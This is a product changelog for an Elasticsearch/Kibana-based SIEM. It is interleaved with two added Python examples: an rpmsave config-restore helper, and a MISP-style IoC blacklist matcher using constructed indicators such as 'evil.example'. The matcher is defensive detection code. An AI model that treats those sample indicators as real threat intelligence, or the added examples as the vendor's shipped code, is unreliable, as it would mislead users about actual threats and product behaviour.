Logstash: Updated to v7.12.1
Network visualization: UI improvements
Object permission: Index pattern optimizations
Plugins: Moved Cluster Management into the right top menu, Scheduler and Sync moved to the Config
Reports: Added report's time range info to report details description
small_backup.sh: Added cerebro and alert configuration
Skimmer: Updated to v1.0.20
Skimmer: Added new metrics, pgpgin, pgpgout
Skimmer: Optimised duration_in_milis statistics
Skimmer: Added option to specify types
Skimmer: Added option to monitor disk usage
Wiki: Added support for nonstandard kibana port
Wiki: Several optimizations for roles
Wiki: Changed default search engine to elasticsearch
Wiki: Added support for own CAs
Wiki: Default authenticator improvements
XLSX Import: UI improvements
BugFixes
Archive: Fixed problems with task statuses
Archive: Fixed application crash when index name included special characters
Archive: Fixed ‘checksum mismatch’ bug
Archive: Fixed bug for showing unencrypted files as encrypted in upload section
Elasticsearch: Fixed bug when changing role caused client crash
Elastfilter: Fixed “_msearch” and “_mget” requests
Elastfilter: Fixed bug when index pattern creation as an admin caused kibana failure
Kibana: Fixed timeout handling
Kibana: Fixed a bug causing application crash when attempting to delete data without permission to it
Logstash: Fixed breaking geoip db when connection error occurred
Object permission: Fixed adding dashboard when all its related objects are already assigned
Reports: Added clearing .tmp files from corrupted csv exports
Reports: Fixed sending PDF instead of JPEG in scheduled reports
Reports: Fixed not working scheduled reports with domain selector enabled
Skimmer: Fixed expected cluster nodes calculation
Wiki: Added missing home page
Wiki: Added auto start of wiki service after installation
Wiki: Fixed logout behaviour
Integrations
Fixed labels in Skimmer dashboard
Fixed Audit dashboard fields
Updated Windows + AD dashboard and pipeline
Added Linux Mail dashboard and pipeline
Added Cisco ASA dashboard and pipeline
Added FortiGate dashboard and pipeline
Added Paloalto dashboard and pipeline
Added Oracle dashboard and pipeline
Added Waystream dashboard and pipeline
Added CEF dashboard and pipeline (CheckPoint, FireEye, Air-Watch, Infoblox, Flowmon, TrendMicro, CyberX, Juniper Networks)
Added monitoring of the alert module on Alert Dashboard
SIEM Plan
Updated SIEM dashboard
Updated QualysGuard integration
Updated Tenable.SC integration
Alert: Updated detection rules (370+)
Alert: Added Cluster-Health alert rules
Wazuh: Updated to v3.13.3
Wazuh: UI improvements
Alert: Improved groups management
Alert: Multiple UI/UX tweaks
Alert: Revised alerts’ descriptions and examples
Alert: Adding included fields when invert:true
Alert: Changed startup behaviour
Alert: Added field from ‘include’ to match_body
Alert: Optimised loading files with misp lists
Alert: Added option to set sourceRef in alert definition
Alert: Include & Exclude in blacklist-ioc lists
Alert: Fixed several issues in chain and logical alerts
Alert: Fixed error when user tried to update alert from newly added group
Alert: Fixed top_count_keys not working with multiple query_key
Alert: Fixed bug when match in blacklist-ioc is breaking other rules
Alert: Fixed empty risk_key breaking alert rule
Alert: Fixed endless loop during scroll
Network-Probe
Added integration with license service
Changed plugin icon
Changed default settings
Changed logs mapping in logstash
Optimised netflow template to be more efficient
Updated .service files
Updated Network-Probe dashboard
API Changes
Elasticsearch: Updated API endpoints.
Following endpoints are deprecated and replaced with:
/_auth/account -> /_logserver/accounts
/_license/reload -> /_logserver/license/reload
/_role-mapping/reload -> /_logserver/auth/reload
/user/updatePassword -> /_logserver/user/password
Following endpoint was removed and replaced with:
/_license->/_logserver/license
Breaking changes
During the update, the “kibana” role will be removed and replaced by “gui-access”, “gui-objects”, “report”. The three will automatically be assigned to all users that prior had the “kibana” role. If you had a custom role that allowed users to log in to the GUI this WILL STOP WORKING and you will have to manually enable the access for users.
The above is also true for LDAP users. If role mapping has been set for role kibana this will have to be manually updated to “gui-access” and if required “gui-objects” and “report” roles.
If any changes have been made to the "kibana" role paths, those will be moved to "gui-objects". GUI object permissions will also be moved to "gui-objects", because "gui-access" cannot be used as a default role.
The “gui-access” is a read-only role and cannot be modified. By default, it will allow users to access all GUI apps; to constrain user access, assign user a role with limited apps permissions.
“small_backup.sh” script changed name to “configuration-backup.sh” - this might break existing cron jobs
SIEM plan is now a separate add-on package (requires an additional license)
Network-Probe is now a separate add-on package (requires an additional license)
(SIEM) Verify rpmsave files for alert and restore them if needed for following:
/opt/alert/config.yaml
/opt/alert/op5_auth_file.yml
/opt/alert/smtp_auth_file.yml
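The three alert files listed above can be displaced by the package upgrade, which leaves the admin's version next to the packaged one as `<file>.rpmsave`. The block below is an added example, not a script shipped with the product: it compares each file with its `.rpmsave` copy, restores the pre-upgrade version only when they actually differ, keeps the packaged file as `<file>.pkg` so the step can be undone, and flags credential files that are readable by group or others. The `demo()` function builds a constructed scenario in a temporary directory; the sample file contents are made up and the `.pkg` suffix is this example's convention.

```python
import difflib
import shutil
import tempfile
from pathlib import Path

# Files named in the changelog as needing an rpmsave check after the upgrade.
ALERT_CONFIGS = [
    "/opt/alert/config.yaml",
    "/opt/alert/op5_auth_file.yml",
    "/opt/alert/smtp_auth_file.yml",
]


def restore_rpmsave(path: Path, apply: bool = False) -> dict:
    """Compare <path> with <path>.rpmsave and, with apply=True, put the rpmsave back in place.

    The packaged file installed by the upgrade is kept as <path>.pkg so the change
    is reversible. shutil.copy2 preserves the rpmsave's mode; the result also reports
    whether the final file is readable by group/others, which matters for the two
    auth files because they hold credentials.
    """
    saved = path.with_name(path.name + ".rpmsave")
    result = {"path": str(path), "rpmsave": saved.exists(), "restored": False,
              "changed_lines": 0, "diff": [], "loose_mode": False}
    if not saved.exists():
        return result  # the upgrade did not displace this file
    current = path.read_text().splitlines() if path.exists() else []
    previous = saved.read_text().splitlines()
    diff = list(difflib.unified_diff(current, previous, fromfile=str(path),
                                     tofile=str(saved), lineterm=""))
    body = [l for l in diff if l[:1] in ("+", "-") and not l.startswith(("+++", "---"))]
    result["diff"] = diff
    result["changed_lines"] = len(body)
    if apply and body:  # identical files need no restore
        if path.exists():
            shutil.copy2(path, path.with_name(path.name + ".pkg"))
        shutil.copy2(saved, path)
        result["restored"] = True
    mode = path.stat().st_mode if path.exists() else 0
    result["loose_mode"] = bool(mode & 0o077)
    return result


def demo() -> dict:
    """Constructed scenario in a temp dir (sample data, not real configs); returns what the check found."""
    root = Path(tempfile.mkdtemp(prefix="rpmsave-demo-"))
    cfg = root / "opt" / "alert"
    cfg.mkdir(parents=True)
    # config.yaml: packaged default vs. the admin's pre-upgrade copy with one extra directive
    (cfg / "config.yaml").write_text("es_host: localhost\nes_port: 9200\n")
    (cfg / "config.yaml.rpmsave").write_text(
        "es_host: localhost\nes_port: 9200\nsmtp_auth_file: /opt/alert/smtp_auth_file.yml\n")
    # op5_auth_file.yml: no rpmsave, the upgrade left it alone
    (cfg / "op5_auth_file.yml").write_text("username: monitor\npassword: constructed\n")
    # smtp_auth_file.yml: rpmsave present but identical, so nothing to restore
    (cfg / "smtp_auth_file.yml").write_text("user: alerts\npassword: constructed\n")
    (cfg / "smtp_auth_file.yml.rpmsave").write_text("user: alerts\npassword: constructed\n")
    for name in ("op5_auth_file.yml", "smtp_auth_file.yml"):
        (cfg / name).chmod(0o600)  # credential files: owner-only
    results = [restore_rpmsave(root / p.lstrip("/"), apply=True) for p in ALERT_CONFIGS]
    return {
        "results": results,
        "config_restored_text": (cfg / "config.yaml").read_text(),
        "packaged_copy_kept": (cfg / "config.yaml.pkg").exists(),
    }


if __name__ == "__main__":
    # Dry run against the real paths: show the diffs, change nothing.
    for p in ALERT_CONFIGS:
        r = restore_rpmsave(Path(p))
        print(f"{p}: rpmsave={r['rpmsave']} changed_lines={r['changed_lines']} loose_mode={r['loose_mode']}")
        print("\n".join(r["diff"]))
```

Run it without `apply=True` first and read the diff: a `.rpmsave` that predates the upgrade can also lack directives the new package expects, so restoring it blindly can reintroduce the missing-directive problems fixed in earlier releases.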
Required post upgrade
Role “wiki” has to be modified to contain only path: “.wiki” and all methods
v7.0.6
NewFeatures
Alert: Added 5 alerts to detect SUNBURST attack
Incidents: Added the ability of transferring the calculated risk_value to be sent in any alarm method
Incidents: Added visibility of unassigned incidents based on user role - security-tenant role
install.sh: Added the ability to update with ./install.sh -u
Improvements
Object permission: Object filtering optimization
Reports: Date verification with scheduler enabled tasks
Reports: UI optimization
BugFixes
Agents: CVE-2020-28168
Alert: Fixes problem with Syslog notifications
Alert: Fixes problem with Test Rule functionality
Alert: CVE-2020-28168
Archive: CVE-2020-28168
Cerebro: CVE-2019-12384
Kibana-xlsx-import: CVE-2020-28168
Login: CVE-2020-28168
Reports: CVE-2020-28168
Reports: Fixes errors related to background tasks
Sync: CVE-2020-28168
v7.0.5
NewFeatures
New plugin: Wiki - integration with wiki.js
Agents: Added index rotation using rollover function
Alert: Added counter with information about how many rules there are in a given group
Alert: Added index rotation using rollover function
Alert: First group will be expanded by default
Alert: New Alert method for Syslog added to GUI
Archive: Added compression level support - archive.compressionOptions [kibana.yml]
Archive: Added mapping/template import support
Archive: Added number of matches in files
Archive: Added regexp and extended regexp support
Archive: Added size information of created archive on list of files for selection
Archive: Added support for archiving a selected field from the index
Archive: Added timestamp field for custom timeframe fields
Audit: Added index rotation using rollover function
Config: Added configuration possibility for Rollover (audit/alert/.agents indexes) in Settings tab
Object Permission: When deleting an object from a role in "object permission" it is now possible to delete related objects at the same time
Reports: Ability to delete multiple tasks at once
Reports: Added details field for each task that includes information about: user, time range, query
Reports: Added Scheduler for “Data Export” tab
Reports: Fields to export are now alphabetical, searchable list
Reports: Scheduled tasks supports: enable, disable, delete
Reports: Scheduled tasks supports: Logo, Title, Comments, PDF/JPEG, CSV/HTML
Installation support for Centos7/8, RedHat7/8, Oracle Linux7/8, Scientific Linux 7, Centos Stream
iFrame embedding support: new directive login.isSameSite in kibana.yml [“Strict” or “None”]
Improvements
Access management: Plugin Login for app management will show itself as Config
Alert: Added support for nested fields in blacklist-ioc alert type
Alert: Alert Dashboard rewritten to alert_status pattern - allows you to filter visible alarms per user
Alert: Cardinality - fix for '_thread._local' object has no attribute 'alerts_sent'
Alert: Chain/Logical - few improvements for output content
Alert: Rule type example is hidden by default
Alert: RunOnce - improved results output
Alert: RunOnce - information that the process has finished
Alert: TestRule - improved error output
Archive: Added document sorting, which speeds up elasticsearch response
Archive: API security -> only admin can use (previously only visual information)
Archive: Archiving process uses a direct connection, bypassing the elastfilter - proxy
Archive: Changed UTC time to local time
Archive: Information about problems with reading/writing to the archive directory
Archive: Optimized function for loading large files - improved loading time
Archive: Optimized saving method to a temporary flat file
Archive: Optimized scroll time which speeds up elasticsearch response
Audit: Converted SEARCH _id: auditselection to GET _id: auditselection
Audit: Removed background task used for refresh audit settings
Beats: Updated to v6.8.14
Blacklist-IOC: Added Duplicates removal mechanism
Blacklist-IOC: Automatic configuration of repository access during installation [install.sh]
Cerebro: Updated to v0.9.3
Config: Character validation for usernames and roles - can consist only of letters a-z, A-Z, numbers 0-9 and characters _,-
Config: Deleting a user deletes his tokens/cookies immediately and causes logging out
Config: Securing the default administrator account against deletion
Config: Session timeout redirect into login screen from all modules
Config: Workaround for automatic filling of fields with passwords in modern browsers
Curator: Updated to v5.8.3 and added support for Python3 as default
ElasticDump: Updated to v6.65.3 and added support for backup all templates at once
Elasticsearch: Removed default user “scheduler” with the admin role - is a thing of history
Elasticsearch: Removed indices.query.bool.max_clause_count from default configuration - causes performance issues
Elasticsearch: Role caching improvements
GEOIP: Automatic configuration of repository access during installation [install.sh]
Incidents: Switching to the Incidents tab creates pattern alert* if not exist
install.sh: Added workaround for cluster.max_shards_per_node=1000 bug
Kibana: Removed kibana.autocomplete from default configuration - causes performance issues
License: Revision and update of license files in all system modules
Logstash: Updated logstash-codec-sflow to v2.1.3
Logstash: Updated logstash-input-beats to v6.1.0
Logstash: Updated to v6.8.14
Logtrail: Added default actionfile for curator - to clean logtrail indexes after 2 days
Network visualization: corrected legend and better colors
Reports: Added Switch button for filtering only scheduled tasks
Reports: Admin users should see all scheduled reports from every other user
Reports: Changed “Export Dashboard” to “Report Export”
Reports: Changed “Export Task Management” to “Data Export”
Reports: Crontab format validated before Submit in Scheduler
Reports: Default task list sorted by “start time”
Reports: Improved security by using kernel namespaces - dropped suid permissions for chrome_sandbox
Reports: Moved “Schedule Export Dashboard” to “Report Export” tab
Reports: Try catch for async getScheduler function
Skimmer: Added alerts: High_lag_on_Kafka_topic, High_node_CPU_usage, High_node_HEAP_usage, High_Flush_duration, High_Indexing_time
Skimmer: New metric - _cat/shards
Skimmer: New metric - _cat/tasks
Skimmer: Updated to v1.0.17
small_backup.sh: Added sync, archive, wiki support
small_backup.sh: Information about the completed operation is logged
Wazuh: Searching in the rule.description field
BugFixes
Access Management: Cosmetic issue in apps select box for default roles (like admin, alert, intelligence, kibana etc.)
Alert: Category name did not appear on the “Risk” list
Alert: Description update for find_match alert type
Alert: Fixes bug where after renaming the alert it is not immediately visible on the list of alerts
Alert: Fixes bug where editing of alert, causes it returns to the Other group
Alert: Fixes incorrect function alertMethodData - problem with TestRule operation [itrs op5 alert-method]
Alert: Fixes problem with ‘[]’ in rule name
Alert: Fixes process status in Alert Status tab
Alert: In groups, if there is pagination, it is not possible to change the page - does not occur with the default group “Others”
Alert: Missing op5_url directive in /opt/alert/config.yaml [itrs op5 alert-method]
Alert: Missing smtp_auth_file directive in /opt/alert/config.yaml [itrs op5 alert-method]
Alert: Missing username directive in /opt/alert/config.yaml [itrs op5 alert-method]
Alert: Overwrite config files after updating, now it should create /opt/alert/config.yml.rpmnew
Archive: Fixes exception during connection problems to elasticsearch
Archive: Missing symlink to runTask.js
Cerebro: Fixes problems with PID file after cerebro crash
Cerebro: Overwrite config files after updating, now it should create /opt/cerebro/conf/application.conf.rpmnew
Config: SSO login misreads application names entered in Access Management
Elasticsearch: Fixes “No value present” message log when not using a radius auth [properties.yml]
Elasticsearch: Fixes “nullPointerException” by adding default value for licenseFilePath [properties.yml]
Incidents: Fixes problem with vanishing status
install.sh: Opens the ports required by logstash via firewall-cmd
install.sh: Set openjdk11 as the default JAVA for the operating system
Kibana: Fixes exception during connection problems to elasticsearch - will stop restarting
Kibana: Fixes URL shortening when using Store URLs in session storage
Logtrail: Fixes missing logrotate definitions for Logtrail logfiles
Logtrail: Overwrite config files after updating, now it should create /usr/share/kibana/plugins/logtrail/logtrail.json.rpmnew
Object Permission: Fixes permission verification error if the overwritten object’s title changes
Reports: Fixes Image Creation failed exception
Reports: Fixes permission problem for checkpass Reports API
Reports: Fixes problems with AD/Radius/LDAP users
Reports: Fixes problem with choosing the date for export
Reports: Fixes setting default index pattern for technical users when using https
Skimmer: Changed kafka.consumer_id to number in default mapping
Skimmer: Fixes in indices stats monitoring
Skimmer: Overwrite config files after updating, now it should create /opt/skimmer/skimmer.conf.rpmnew
v7.0.4
NewFeatures
New plugin: Archive specified indices
Applications Access management based on roles
Dashboards: Possibility to play a sound on the dashboard
Tenable.SC: Integration with dedicated dashboard
QualysGuard: Integration with dedicated dashboard
Wazuh: added installation package
Beats: added to installation package
Central Agents Management (masteragent): Stop & start & restart for each registered agent
Central Agents Management (masteragent): Status of detected beats and master agent in each registered agent
Central Agents Management (masteragent): Tab with the list of agents can be grouped
Central Agents Management (masteragent): Autorolling documents from .agents index based on a Settings in Config tab
Alert: New Alert method for op5 Monitor added to GUI.
Alert: New Alert method for Slack added to GUI.
Alert: Name-change - the ability to rename an already created rule
Alert: Groups for different alert types
Alert: Possibility to modify all alarms in selected group
Alert: Calendar - calendar for managing notifications
Alert: Escalate - escalate alarm after specified time
Alert: TheHive integration
Improvements
Object Permission: When adding an object to a role in “object permission” now is possible to add related objects at the same time
Skimmer: New metric - increase of documents in a specific index
Skimmer: New metric - size of a specific index
Skimmer: New metric - expected datanodes
Skimmer: New metric - kafka offset in Kafka cluster
Installation script: The setup script validates the license
Installation script: Support for Centos 8
AD integration: Domain selector on login page
Incidents: New fieldsToSkipForVerify option for skipping false-positives
Alert: Added sorting of labels in comboxes
User Roles: Alphabetical, searchable list of roles
User Roles: List of users assigned to a given role
Audit: Cache for audit settings (performance)
Diagnostic-tool.sh: Added cerebro to audit files
Alert Chain/Logical: Few improvements
BugFixes
Role caching fix for working in multiple node setup.
Alert: Aggregation schedule time
Alert: Loading new_term fields
Alert: RecursionError: maximum recursion depth exceeded in comparison
Alert: Match_body.kibana_discover_url malfunction in aggregation
Alert: Dashboard Recovery from Alert Status tab
Reports: Black bars after JPEG dashboard export
Reports: Problems with Scheduled reports
Elasticsearch-auth: Forbidden - not authorized when querying an alias with a wildcard
Dashboards: Logserver_table is not present in 7.X, it has been replaced with basic table
Logstash: Mikrotik pipeline - failed to start pipeline
v7.0.3
NewFeatures
Alert: new type - Chain - create alert from underlying rules triggered in defined order
Alert: new type - Logical - create alert from underlying rules triggered with defined logic (OR,AND,NOR)
Alert: correlate alerts for Chain and Logical types - alert is triggered only if each rule return same value (ip, username, process etc)
Alert: each triggered alert is indexed with unique alert_id - field added to default field schema
Alert: Processing Time visualization on Alert dashboard - easy to identify badly designed alerts
Alert: support for automatic search link generation
Input: added mikrotik parsing rules
Auditing : added IP address field for each action
Auditing : possibility to exclude values from auditing
Skimmer: indexing rate visualization
Skimmer: new metric: offset in Kafka topics
Skimmer: new metric: expected-datanodes
MasterAgent: added possibility for beats agents restart and the master agent itself (GUI)
Improvements
Search and sort support for User List in Config section
Copy/Sync: now supports “insecure” mode (operations without certificates)
Fix for “add sample data & web sample dashboard” from Home Page -> changes in default-base-template
Skimmer: service status check rewritten to dbus api
Masteragent: possibility to exclude older SSL protocols
Masteragent: now supports Centos 8 and related distros
XLSX import: updated to 7.6.1
Logstash: masteragent pipeline shipped by default
Blacklist: Name field and Field names in the Fields column & Default field exclusions
Blacklist: runOnce is only killed on a fatal Alert failure
Blacklist: IOC excludes threats marked as false-positive
Incidents: new design for Preview
Incidents: Note - new feature, ability to add notes to incidents
Risks: possibility to add new custom value for risk, without the need to index that value
Alert: much better performance with multithread support - now default
Alert: Validation of email addresses in the Alerts plugin
Alert: “Difference” rule description include examples for alert recovery function
Logtrail: improved the beauty and readability of the plugin
Security: jquery updated to 3.5.1
Security: bootstrap updated to 4.5.0
The HELP button (in kibana) now leads to the official product documentation
Centralization of previous alert code changes to single module
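The Blacklist-IOC notes in 7.0.5 (nested-field support, duplicate removal) and in the 7.0.3 list above (threats marked false-positive are excluded) describe how the blacklist-ioc alert type treats its MISP-fed lists. The block below is an added example, not the plugin's code, that implements those three behaviours end to end: it indexes a constructed MISP-style feed by normalised value so duplicates collapse, drops entries tagged `false-positive` (or with `to_ids` false), and matches events on dotted field paths that may pass through nested objects and lists. The feed keys (`type`, `value`, `tags`, `to_ids`), the watched field names and all sample values are assumptions of the example.

```python
from typing import Any, Dict, Iterable, List


def _norm(value: Any) -> str:
    """Canonical form for comparison: lower-case, trimmed, no trailing dot (FQDN form)."""
    return str(value).strip().lower().rstrip(".")


def load_iocs(feed: Iterable[dict]) -> Dict[str, dict]:
    """Index a feed by normalised value, collapsing duplicates and skipping false positives."""
    iocs: Dict[str, dict] = {}
    for entry in feed:
        if "false-positive" in entry.get("tags", []) or not entry.get("to_ids", True):
            continue  # analyst marked it as noise, or the source says do not use for detection
        key = _norm(entry["value"])
        if key in iocs:
            continue  # first occurrence wins; later duplicates are dropped
        iocs[key] = {"type": entry["type"], "value": key, "source": entry.get("source", "misp")}
    return iocs


def field_values(obj: Any, path: str) -> List[Any]:
    """Resolve a dotted path through nested dicts and lists; returns every leaf value found."""
    if isinstance(obj, list):
        return [v for item in obj for v in field_values(item, path)]
    head, _, rest = path.partition(".")
    if not isinstance(obj, dict) or head not in obj:
        return []
    value = obj[head]
    if not rest:
        return value if isinstance(value, list) else [value]
    return field_values(value, rest)


# Event fields compared against the list (assumed names, ECS-style).
WATCHED_FIELDS = ["source.ip", "destination.ip", "dns.question.name", "dns.answers.ip", "file.hash.md5"]


def match_event(event: dict, iocs: Dict[str, dict], fields=WATCHED_FIELDS) -> List[dict]:
    """Return one hit per (field, value) pair in the event that is on the list."""
    hits = []
    for path in fields:
        for value in field_values(event, path):
            ioc = iocs.get(_norm(value))
            if ioc:
                hits.append({"field": path, "value": value, "ioc": ioc})
    return hits


# Constructed feed: two exact duplicates, two entries equal after normalisation, one false positive.
SAMPLE_FEED = [
    {"type": "ip-dst", "value": "198.51.100.23", "tags": [], "to_ids": True},
    {"type": "ip-dst", "value": "198.51.100.23", "tags": [], "to_ids": True},
    {"type": "domain", "value": "EVIL.example.", "tags": [], "to_ids": True},
    {"type": "domain", "value": "evil.example", "tags": [], "to_ids": True},
    {"type": "domain", "value": "update.example", "tags": ["false-positive"], "to_ids": True},
    {"type": "md5", "value": "d41d8cd98f00b204e9800998ecf8427e", "tags": [], "to_ids": True},
]

# Constructed events; the second one carries the indicator inside a list of DNS answers.
SAMPLE_EVENTS = [
    {"source": {"ip": "10.0.0.4"}, "destination": {"ip": "198.51.100.23"}},
    {"source": {"ip": "10.0.0.5"}, "dns": {"question": {"name": "evil.example"},
                                            "answers": [{"ip": "203.0.113.9"}, {"ip": "198.51.100.23"}]}},
    {"source": {"ip": "10.0.0.6"}, "dns": {"question": {"name": "update.example"}}},
    {"source": {"ip": "10.0.0.7"}, "file": {"hash": {"md5": "D41D8CD98F00B204E9800998ECF8427E"}}},
]

if __name__ == "__main__":
    iocs = load_iocs(SAMPLE_FEED)
    print(f"{len(SAMPLE_FEED)} feed entries -> {len(iocs)} usable indicators")
    for event in SAMPLE_EVENTS:
        for hit in match_event(event, iocs):
            print(f"{event['source']['ip']}: {hit['field']}={hit['value']} matches {hit['ioc']['type']} IoC")
```

Normalising both sides of the comparison is what makes the duplicate removal and the matching agree: without it the feed would carry `EVIL.example.` and `evil.example` as two indicators, and an event whose hash is upper-cased would slip past a list that stores it in lower case.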
BugFixes
Individual special characters caused problems in user passwords
Bad permissions for scheduler of Copy/Sync module has been corrected
Wrong Alert status in the alert status tab
Skimmer: forcemerge caused negative values for cluster_stats_indices_docs_per_sec metric
diagnostic-tool.sh: wrong name for the archive in output
Reports: export to csv support STOP action
Reports: scroll errors in csv exports
Alert: .alertrules is not a required index for proper system operation
Alert: /opt/alerts/testrules is not a required directory for proper system operation
Alert: .riskcategories is not a required index for proper system operation
Malfunction in Session Timeout
Missing directives service_principal_name in bundled properties.yml
Blacklist: Removal of the doc type in blacklist template
Blacklist: Problem with “generate_kibana_discover_url: true” directive
Alert: Overwriting an alert when trying to create a new alert with the same name
Reports: When exporting dashboards, PDF generates only one page or cuts the page
Wrong product logo when viewing dashboards in full screen mode
v7.0.2
NewFeatures
Manual incident - creating manual incidents from the Discovery section
New kibana plugin - Sync/Copy between clusters
Alert: Analyze historical data with defined alert
Indicators of compromise (IoC) - providing blacklists based on Malware Information Sharing Platform (MISP)
Automatic update of MaxMind GeoIP Databases [asn, city, country]
Extended LDAP support
Cross cluster search
Diagnostic script to collect information about the environment, log files, configuration files - utils/diagnostic-tool.sh
New beat: op5beat - dedicated data shipper from op5 Monitor
Improvements
Added _license API for elasticsearch (it replaces licensepath which is now deprecated and will stop working in future releases)
_license API now shows expiration_date and days_left
Visual indicator on Config tab for expiring license (for 30 days and less)
Creating a new user now requires reentering the password
Complexity check for password fields
Incidents can be supplemented with notes
Alert Spike: more detailed description of usage
ElasticDump added to base installation - /usr/share/kibana/elasticdump
Alert plugin updated - frontend
Reimplemented session timeout for user activity
Skimmer: new metrics and dashboard for Cluster Monitoring
Wazuh config/keys added to small_backup.sh script
Logrotate definitions for Logtrail logfiles
Incidents can be sorted by Risk value
UTF-8 support for credentials
Wazuh: wrong document_type and timestamp field
BugFixes
Audit: Missing Audit entry for successful SSO login
Report: “stderr maxBuffer length exceeded” - export to csv
Report: “Too many scroll contexts” - export to csv
Intelligence: incorrect work in updated environments
Agents: fixed wrong document type
Kibana: “Add Data to Kibana” from Home Page
Incidents: the preview button uses the wrong index-pattern
Audit: Missing information about login errors of ad/ldap users
Netflow: fix for netflow v9
MasterAgent: none/certificate verification mode should work as intended
Incorrect CSS injections for dark theme
The role could not be removed in specific scenarios
v7.0.1
init
migrated features from branch 6 [ latest:6.1.8 ]
XLSX import [kibana]
curator added to /usr/share/kibana/curator
node_modules updated! [kibana]
elasticsearch upgraded to 7.3.2
kibana upgraded to 7.3.2
dedicated icons for all kibana modules
eui as default framework for login, reports
bugfix: alerts type description fix